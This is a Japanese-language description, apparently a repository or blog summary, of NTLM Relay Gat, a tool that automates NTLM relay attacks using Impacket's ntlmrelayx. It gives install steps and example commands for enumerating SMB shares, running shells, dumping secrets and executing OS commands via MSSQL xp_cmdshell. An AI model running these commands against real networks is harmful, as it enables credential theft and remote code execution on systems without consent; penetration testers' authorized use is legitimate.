
ntlmrelayx.pyを使用して、SMB共有の列挙、シェル実行、シークレットダンプ、およびマルチスレッドセッションによるMSSQLコマンド実行を自動化するNTLMリレー攻撃ツールです。

NTLM Relay Gatは、Impacketツールスイートのntlmrelayx.pyを使用してNTLMリレーの悪用を自動化するように設計された強力なツールです。ntlmrelayx.pyの機能を活用することで、NTLM Relay GatはNTLMリレーの脆弱性を悪用するプロセスを効率化し、SMB共有の一覧表示からMSSQLデータベースでのコマンド実行まで、さまざまな機能を提供します。
開始する前に、以下の要件を満たしていることを確認してください。
proxychainsがntlmrelayxのSOCKSリレーポートで適切に設定されていることNTLM Relay Gatをインストールするには、次の手順に従ってください。
システムにPython 3.6以上がインストールされていることを確認してください。
NTLM Relay Gatリポジトリをクローンします:
git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
pip install -r requirements.txt
NTLM Relay Gatがインストールされ、使用する準備が整いました。
NTLM Relay Gatを使用するには、ntlmrelayx.pyのsocksコマンド出力にリレーセッションがあり、proxychainsがntlmrelayx.pyのプロキシを使用するように設定されていることを確認してから、スクリプトを目的のオプションで実行します。以下に、NTLM Relay Gatの実行例を示します。
# 10スレッドを使用して利用可能なSMB共有を一覧表示
python ntlm_relay_gat.py --smb-shares -t 10
# SMB経由でシェルを実行
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell
# ターゲットからシークレットをダンプ
python ntlm_relay_gat.py --dump-secrets
# 利用可能なMSSQLデータベースを一覧表示
python ntlm_relay_gat.py --mssql-dbs
# xp_cmdshellを介してオペレーティングシステムコマンドを実行
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'
NTLM Relay Gatは、教育および倫理的なペネトレーションテスト目的のみを意図しています。事前の相互同意なしにターゲットを攻撃するためにNTLM Relay Gatを使用することは違法です。NTLM Relay Gatの開発者は、一切の責任を負わず、このツールの誤用または損害について責任を負いません。
このプロジェクトはMITライセンスの下でライセンスされています。詳細についてはLICENSEファイルを参照してください。